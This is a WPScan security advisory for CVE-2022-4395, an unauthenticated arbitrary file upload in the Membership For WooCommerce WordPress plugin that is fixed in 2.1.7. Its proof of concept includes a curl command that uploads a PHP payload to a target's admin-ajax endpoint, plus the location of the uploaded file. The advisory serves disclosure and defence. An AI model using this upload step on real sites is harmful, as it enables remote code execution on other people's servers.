WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Membership For WooCommerce < 2.1.7 - Unauthenticated Arbitrary File Upload

Description

The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as malicious PHP code, and achieve RCE.

Proof of Concept

1. Install and activate WooCommerce (dependency, no setup required) 

2. Create a local file containing the payload on /tmp/payload.php 

3. Execute the following curl command:
 
curl -i 'https://example.com/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload' -F '[email protected]/tmp/payload.php;type=text/csv'
 
4. The uploaded file will be available at wp-content/uploads/mfw-activity-logger/csv-uploads .

Affects Plugins

membership-for-woocommerce
Fixed in version 2.1.7

References

CVE
CVE-2022-4395

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
80407ac4-8ce3-4df7-9c41-007b69045c40

Timeline

Publicly Published

2023-01-04 (about 2 months ago)

Added

2023-01-04 (about 2 months ago)

Last Updated

2023-01-04 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin